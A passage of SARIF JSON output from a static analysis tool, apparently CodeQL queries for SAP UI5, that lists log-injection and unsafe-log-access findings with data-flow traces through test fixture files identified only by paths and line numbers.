/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":24,"startColumn":23,"endColumn":32}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":24,"startColumn":23,"endColumn":40}},"message":{"text":"oLogEntry.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":13,"startColumn":19,"endColumn":36}}}],"partialFingerprints":{"primaryLocationLineHash":"d67a8ded95b9934b:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":9,"startColumn":29,"endColumn":38}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":13,"startColumn":19,"endColumn":28}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":13,"startColumn":19,"endColumn":36}},"message":{"text":"oLogEntry.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":11,"startColumn":19,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"83472515fe67207a:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":7,"startColumn":23,"endColumn":42}},"message":{"text":"Log.getLogEntries()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":7,"startColumn":13,"endColumn":20}},"message":{"text":"message"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":11,"startColumn":19,"endColumn":26}},"message":{"text":"message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":13,"startColumn":19,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"84768bf2b1d6e5a5:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":9,"startColumn":29,"endColumn":35}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":13,"startColumn":19,"endColumn":25}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":13,"startColumn":19,"endColumn":33}},"message":{"text":"oEvent.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":350},"region":{"startLine":5,"startColumn":9,"endLine":24,"endColumn":10}}}],"partialFingerprints":{"primaryLocationLineHash":"fad475448f62563d:1","primaryLocationStartColumnFingerprint":"-139"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":350},"region":{"startLine":6,"startColumn":5,"endLine":8,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":15,"startColumn":25,"endColumn":53}},"message":{"text":"oModel. ... input')"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":15,"startColumn":17,"endColumn":22}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":17,"startColumn":34,"endColumn":39}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":350},"region":{"startLine":6,"startColumn":5,"endLine":8,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":350},"region":{"startLine":6,"startColumn":5,"endLine":8,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347},"region":{"startLine":17,"startColumn":34,"endColumn":39}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315},"region":{"startLine":7,"startColumn":23,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"20e0edf06769f248:1","primaryLocationStartColumnFingerprint":"14"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":20,"startColumn":33,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"eb64edf724fde59e:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":8,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":17,"startColumn":19,"endColumn":24}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":17,"startColumn":19,"endColumn":24}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":9,"startColumn":29,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"eb64edf724fde59e:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":7,"startColumn":23,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"20e0edf06769f248:1","primaryLocationStartColumnFingerprint":"14"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-unsafe-log-access","rule":{"id":"js/ui5-unsafe-log-access","index":3,"toolComponent":{"index":4}},"message":{"text":"Accessed log entries depend on [user-provided data](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":9,"startColumn":29,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"e10e4681e4f3a5f2:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... 